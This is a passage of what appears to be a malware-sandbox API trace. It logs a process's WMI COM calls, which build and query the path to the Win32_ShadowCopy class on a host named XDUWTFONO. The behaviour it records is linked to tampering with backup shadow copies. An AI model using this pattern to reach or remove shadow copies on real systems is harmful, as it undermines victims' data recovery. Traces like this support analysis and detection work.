riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90c470 | out: ppvObject=0x1c90c470*=0x0) returned 0x80004002 [0108.788] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be417c0, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c458 | out: ppvObject=0x1c90c458*=0x1be46dc0) returned 0x0 [0108.788] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be46dc0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c360 | out: ppvObject=0x1c90c360*=0x1be46dc0) returned 0x0 [0108.789] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be46dc0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90c3e0 | out: ppvObject=0x1c90c3e0*=0x0) returned 0x80004002 [0108.789] WbemDefPath:IUnknown:AddRef (This=0x1be46dc0) returned 0x3 [0108.789] CoGetContextToken (in: pToken=0x1c90c030 | out: pToken=0x1c90c030) returned 0x0 [0108.789] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be46dc0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90bff0 | out: ppvObject=0x1c90bff0*=0x1b92cde0) returned 0x0 [0108.790] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b92cde0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90c020 | out: pCid=0x1c90c020*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.790] WbemDefPath:IUnknown:Release (This=0x1b92cde0) returned 0x3 [0108.791] CoGetContextToken (in: pToken=0x1c90c000 | out: pToken=0x1c90c000) returned 0x0 [0108.791] WbemDefPath:IUnknown:AddRef (This=0x1be46dc0) returned 0x4 [0108.791] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be46dc0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c118 | out: ppvObject=0x1c90c118*=0x0) returned 0x80004002 [0108.791] WbemDefPath:IUnknown:Release (This=0x1be46dc0) returned 0x3 [0108.791] WbemDefPath:IUnknown:Release (This=0x1be46dc0) returned 0x2 [0108.791] WbemDefPath:IUnknown:Release (This=0x1be417c0) returned 0x0 [0108.791] WbemDefPath:IUnknown:Release (This=0x1be46dc0) returned 0x1 [0108.792] CoGetContextToken (in: pToken=0x1c90cd30 | out: pToken=0x1c90cd30) returned 0x0 [0108.792] CoGetContextToken (in: pToken=0x1c90cc70 | out: pToken=0x1c90cc70) returned 0x0 [0108.792] WbemDefPath:IUnknown:AddRef (This=0x1be46dc0) returned 0x2 [0108.792] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be46dc0, riid=0x1c90cdb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cd90 | out: ppvObject=0x1c90cd90*=0x1be46dc0) returned 0x0 [0108.792] WbemDefPath:IUnknown:Release (This=0x1be46dc0) returned 0x2 [0108.792] WbemDefPath:IUnknown:Release (This=0x1be46dc0) returned 0x1 [0108.792] CoGetContextToken (in: pToken=0x1c90ceb0 | out: pToken=0x1c90ceb0) returned 0x0 [0108.792] CoGetContextToken (in: pToken=0x1c90cdf0 | out: pToken=0x1c90cdf0) returned 0x0 [0108.792] WbemDefPath:IUnknown:AddRef (This=0x1be46dc0) returned 0x2 [0108.792] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be46dc0, riid=0x1c90cf30*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cf10 | out: ppvObject=0x1c90cf10*=0x1be46dc0) returned 0x0 [0108.792] WbemDefPath:IUnknown:Release (This=0x1be46dc0) returned 0x2 [0108.793] WbemDefPath:IUnknown:AddRef (This=0x1be46dc0) returned 0x3 [0108.793] WbemDefPath:IWbemPath:SetText (This=0x1be46dc0, uMode=0x4, pszPath="") returned 0x0 [0108.793] WbemDefPath:IUnknown:Release (This=0x1be46dc0) returned 0x2 [0108.793] CoGetObjectContext (in: riid=0x1c90d0d8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d0d0 | out: ppv=0x1c90d0d0*=0x142498) returned 0x0 [0108.793] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90d0f0 | out: pAptType=0x1c90d0f0*=1) returned 0x0 [0108.793] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90d1f8 | out: ppvObject=0x1c90d1f8*=0x0) returned 0x80004002 [0108.793] IUnknown:Release (This=0x142498) returned 0x1 [0108.794] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90c760 | out: ppv=0x1c90c760*=0x1be417c0) returned 0x0 [0108.794] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be417c0, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90c470 | out: ppvObject=0x1c90c470*=0x0) returned 0x80004002 [0108.794] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be417c0, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c458 | out: ppvObject=0x1c90c458*=0x1be46ec0) returned 0x0 [0108.794] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be46ec0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c360 | out: ppvObject=0x1c90c360*=0x1be46ec0) returned 0x0 [0108.794] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be46ec0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90c3e0 | out: ppvObject=0x1c90c3e0*=0x0) returned 0x80004002 [0108.795] WbemDefPath:IUnknown:AddRef (This=0x1be46ec0) returned 0x3 [0108.795] CoGetContextToken (in: pToken=0x1c90c030 | out: pToken=0x1c90c030) returned 0x0 [0108.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be46ec0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90bff0 | out: ppvObject=0x1c90bff0*=0x1b92ce00) returned 0x0 [0108.795] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b92ce00, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90c020 | out: pCid=0x1c90c020*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.795] WbemDefPath:IUnknown:Release (This=0x1b92ce00) returned 0x3 [0108.795] CoGetContextToken (in: pToken=0x1c90c000 | out: pToken=0x1c90c000) returned 0x0 [0108.795] WbemDefPath:IUnknown:AddRef (This=0x1be46ec0) returned 0x4 [0108.795] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be46ec0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c118 | out: ppvObject=0x1c90c118*=0x0) returned 0x80004002 [0108.795] WbemDefPath:IUnknown:Release (This=0x1be46ec0) returned 0x3 [0108.795] WbemDefPath:IUnknown:Release (This=0x1be46ec0) returned 0x2 [0108.796] WbemDefPath:IUnknown:Release (This=0x1be417c0) returned 0x0 [0108.796] WbemDefPath:IUnknown:Release (This=0x1be46ec0) returned 0x1 [0108.796] CoGetContextToken (in: pToken=0x1c90cd30 | out: pToken=0x1c90cd30) returned 0x0 [0108.796] CoGetContextToken (in: pToken=0x1c90cc70 | out: pToken=0x1c90cc70) returned 0x0 [0108.796] WbemDefPath:IUnknown:AddRef (This=0x1be46ec0) returned 0x2 [0108.796] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be46ec0, riid=0x1c90cdb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cd90 | out: ppvObject=0x1c90cd90*=0x1be46ec0) returned 0x0 [0108.796] WbemDefPath:IUnknown:Release (This=0x1be46ec0) returned 0x2 [0108.796] WbemDefPath:IUnknown:Release (This=0x1be46ec0) returned 0x1 [0108.797] CoGetContextToken (in: pToken=0x1c90ceb0 | out: pToken=0x1c90ceb0) returned 0x0 [0108.797] CoGetContextToken (in: pToken=0x1c90cdf0 | out: pToken=0x1c90cdf0) returned 0x0 [0108.797] WbemDefPath:IUnknown:AddRef (This=0x1be46ec0) returned 0x2 [0108.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be46ec0, riid=0x1c90cf30*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cf10 | out: ppvObject=0x1c90cf10*=0x1be46ec0) returned 0x0 [0108.797] WbemDefPath:IUnknown:Release (This=0x1be46ec0) returned 0x2 [0108.797] WbemDefPath:IUnknown:AddRef (This=0x1be46ec0) returned 0x3 [0108.797] WbemDefPath:IWbemPath:SetText (This=0x1be46ec0, uMode=0x4, pszPath="") returned 0x0 [0108.797] WbemDefPath:IUnknown:Release (This=0x1be46ec0) returned 0x2 [0108.797] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be46ec0, puCount=0x1c90d1d0 | out: puCount=0x1c90d1d0*=0x0) returned 0x0 [0108.797] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be46dc0, puCount=0x1c90d1d0 | out: puCount=0x1c90d1d0*=0x0) returned 0x0 [0108.799] WbemDefPath:IWbemPath:GetClassName (in: This=0x1be46ec0, puBuffLength=0x1c90d270*=0x0, pszName=0x0 | out: puBuffLength=0x1c90d270*=0x0, pszName=0x0) returned 0x8004103a [0108.800] WbemDefPath:IWbemPath:GetServer (in: This=0x1be46ec0, puNameBufLength=0x1c90d270*=0x0, pName=0x0 | out: puNameBufLength=0x1c90d270*=0x0, pName=0x0) returned 0x80041009 [0108.801] WbemDefPath:IWbemPath:SetServer (This=0x1be46ec0, Name="XDUWTFONO") returned 0x0 [0108.801] CoGetObjectContext (in: riid=0x1c90d0d8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d0d0 | out: ppv=0x1c90d0d0*=0x142498) returned 0x0 [0108.801] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90d0f0 | out: pAptType=0x1c90d0f0*=1) returned 0x0 [0108.801] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90d1f8 | out: ppvObject=0x1c90d1f8*=0x0) returned 0x80004002 [0108.801] IUnknown:Release (This=0x142498) returned 0x1 [0108.801] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90c760 | out: ppv=0x1c90c760*=0x1be41800) returned 0x0 [0108.802] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be41800, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90c470 | out: ppvObject=0x1c90c470*=0x0) returned 0x80004002 [0108.802] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be41800, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c458 | out: ppvObject=0x1c90c458*=0x1be44ae0) returned 0x0 [0108.802] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be44ae0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c360 | out: ppvObject=0x1c90c360*=0x1be44ae0) returned 0x0 [0108.802] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be44ae0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90c3e0 | out: ppvObject=0x1c90c3e0*=0x0) returned 0x80004002 [0108.802] WbemDefPath:IUnknown:AddRef (This=0x1be44ae0) returned 0x3 [0108.802] CoGetContextToken (in: pToken=0x1c90c030 | out: pToken=0x1c90c030) returned 0x0 [0108.802] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be44ae0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90bff0 | out: ppvObject=0x1c90bff0*=0x1b92ce40) returned 0x0 [0108.803] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b92ce40, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90c020 | out: pCid=0x1c90c020*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.803] WbemDefPath:IUnknown:Release (This=0x1b92ce40) returned 0x3 [0108.803] CoGetContextToken (in: pToken=0x1c90c000 | out: pToken=0x1c90c000) returned 0x0 [0108.803] WbemDefPath:IUnknown:AddRef (This=0x1be44ae0) returned 0x4 [0108.803] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be44ae0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c118 | out: ppvObject=0x1c90c118*=0x0) returned 0x80004002 [0108.803] WbemDefPath:IUnknown:Release (This=0x1be44ae0) returned 0x3 [0108.803] WbemDefPath:IUnknown:Release (This=0x1be44ae0) returned 0x2 [0108.803] WbemDefPath:IUnknown:Release (This=0x1be41800) returned 0x0 [0108.803] WbemDefPath:IUnknown:Release (This=0x1be44ae0) returned 0x1 [0108.804] CoGetContextToken (in: pToken=0x1c90cd30 | out: pToken=0x1c90cd30) returned 0x0 [0108.804] CoGetContextToken (in: pToken=0x1c90cc70 | out: pToken=0x1c90cc70) returned 0x0 [0108.804] WbemDefPath:IUnknown:AddRef (This=0x1be44ae0) returned 0x2 [0108.804] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be44ae0, riid=0x1c90cdb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cd90 | out: ppvObject=0x1c90cd90*=0x1be44ae0) returned 0x0 [0108.804] WbemDefPath:IUnknown:Release (This=0x1be44ae0) returned 0x2 [0108.804] WbemDefPath:IUnknown:Release (This=0x1be44ae0) returned 0x1 [0108.804] CoGetContextToken (in: pToken=0x1c90ceb0 | out: pToken=0x1c90ceb0) returned 0x0 [0108.804] CoGetContextToken (in: pToken=0x1c90cdf0 | out: pToken=0x1c90cdf0) returned 0x0 [0108.804] WbemDefPath:IUnknown:AddRef (This=0x1be44ae0) returned 0x2 [0108.804] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be44ae0, riid=0x1c90cf30*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cf10 | out: ppvObject=0x1c90cf10*=0x1be44ae0) returned 0x0 [0108.804] WbemDefPath:IUnknown:Release (This=0x1be44ae0) returned 0x2 [0108.805] WbemDefPath:IUnknown:AddRef (This=0x1be44ae0) returned 0x3 [0108.805] WbemDefPath:IWbemPath:SetText (This=0x1be44ae0, uMode=0x4, pszPath="root\\cimv2") returned 0x0 [0108.805] WbemDefPath:IUnknown:Release (This=0x1be44ae0) returned 0x2 [0108.805] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be46ec0, puCount=0x1c90d1d0 | out: puCount=0x1c90d1d0*=0x0) returned 0x0 [0108.805] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be44ae0, puCount=0x1c90d1d0 | out: puCount=0x1c90d1d0*=0x2) returned 0x0 [0108.805] WbemDefPath:IWbemPath:GetText (in: This=0x1be44ae0, lFlags=16, puBuffLength=0x1c90d1d0*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d1d0*=0xb, pszText=0x0) returned 0x0 [0108.805] WbemDefPath:IWbemPath:GetText (in: This=0x1be44ae0, lFlags=16, puBuffLength=0x1c90d1d0*=0xb, pszText="0000000000" | out: puBuffLength=0x1c90d1d0*=0xb, pszText="root\\cimv2") returned 0x0 [0108.806] WbemDefPath:IWbemPath:RemoveAllNamespaces (This=0x1be46ec0) returned 0x0 [0108.806] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be44ae0, puCount=0x1c90d230 | out: puCount=0x1c90d230*=0x2) returned 0x0 [0108.807] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1be44ae0, uIndex=0x0, puNameBufLength=0x1c90d230*=0x0, pName=0x0 | out: puNameBufLength=0x1c90d230*=0x5, pName=0x0) returned 0x0 [0108.807] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1be44ae0, uIndex=0x0, puNameBufLength=0x1c90d230*=0x5, pName="0000" | out: puNameBufLength=0x1c90d230*=0x5, pName="root") returned 0x0 [0108.807] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x1be46ec0, uIndex=0x0, pszName="root") returned 0x0 [0108.807] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1be44ae0, uIndex=0x1, puNameBufLength=0x1c90d230*=0x0, pName=0x0 | out: puNameBufLength=0x1c90d230*=0x6, pName=0x0) returned 0x0 [0108.808] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1be44ae0, uIndex=0x1, puNameBufLength=0x1c90d230*=0x6, pName="00000" | out: puNameBufLength=0x1c90d230*=0x6, pName="cimv2") returned 0x0 [0108.808] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x1be46ec0, uIndex=0x1, pszName="cimv2") returned 0x0 [0108.808] WbemDefPath:IWbemPath:GetClassName (in: This=0x1be46ec0, puBuffLength=0x1c90d270*=0x0, pszName=0x0 | out: puBuffLength=0x1c90d270*=0x0, pszName=0x0) returned 0x8004103a [0108.809] WbemDefPath:IWbemPath:SetClassName (This=0x1be46ec0, Name="Win32_ShadowCopy") returned 0x0 [0108.809] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be46ec0, puCount=0x1c90d2f0 | out: puCount=0x1c90d2f0*=0x2) returned 0x0 [0108.809] WbemDefPath:IWbemPath:GetText (in: This=0x1be46ec0, lFlags=4, puBuffLength=0x1c90d2f0*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d2f0*=0x28, pszText=0x0) returned 0x0 [0108.809] WbemDefPath:IWbemPath:GetText (in: This=0x1be46ec0, lFlags=4, puBuffLength=0x1c90d2f0*=0x28, pszText="000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d2f0*=0x28, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy") returned 0x0 [0108.809] IWbemClassObject:Get (in: This=0x1be44830, wszName="__SERVER", lFlags=0, pVal=0x1c90d1e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d1dc*=0, plFlavor=0x1c90d1d8*=0 | out: pVal=0x1c90d1e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c90d1dc*=8, plFlavor=0x1c90d1d8*=64) returned 0x0 [0108.809] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0108.809] IWbemClassObject:Get (in: This=0x1be44830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d1e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d1dc*=8, plFlavor=0x1c90d1d8*=64 | out: pVal=0x1c90d1e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d1dc*=8, plFlavor=0x1c90d1d8*=64) returned 0x0 [0108.809] SysStringLen (param_1="root\\cimv2") returned 0xa [0108.809] IWbemClassObject:Get (in: This=0x1be44830, wszName="__CLASS", lFlags=0, pVal=0x1c90d1e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d1dc*=8, plFlavor=0x1c90d1d8*=64 | out: pVal=0x1c90d1e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d1dc*=8, plFlavor=0x1c90d1d8*=64) returned 0x0 [0108.809] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0108.809] CoGetObjectContext (in: riid=0x1c90d088*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d080 | out: ppv=0x1c90d080*=0x142498) returned 0x0 [0108.809] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90d0a0 | out: pAptType=0x1c90d0a0*=1) returned 0x0 [0108.810] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90d1a8 | out: ppvObject=0x1c90d1a8*=0x0) returned 0x80004002 [0108.810] IUnknown:Release (This=0x142498) returned 0x1 [0108.810] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90c710 | out: ppv=0x1c90c710*=0x1be41920) returned 0x0 [0108.810] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be41920, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90c420 | out: ppvObject=0x1c90c420*=0x0) returned 0x80004002 [0108.810] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be41920, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c408 | out: ppvObject=0x1c90c408*=0x1be44ed0) returned 0x0 [0108.811] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be44ed0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c310 | out: ppvObject=0x1c90c310*=0x1be44ed0) returned 0x0 [0108.811] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be44ed0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90c390 | out: ppvObject=0x1c90c390*=0x0) returned 0x80004002 [0108.811] WbemDefPath:IUnknown:AddRef (This=0x1be44ed0) returned 0x3 [0108.811] CoGetContextToken (in: pToken=0x1c90bfe0 | out: 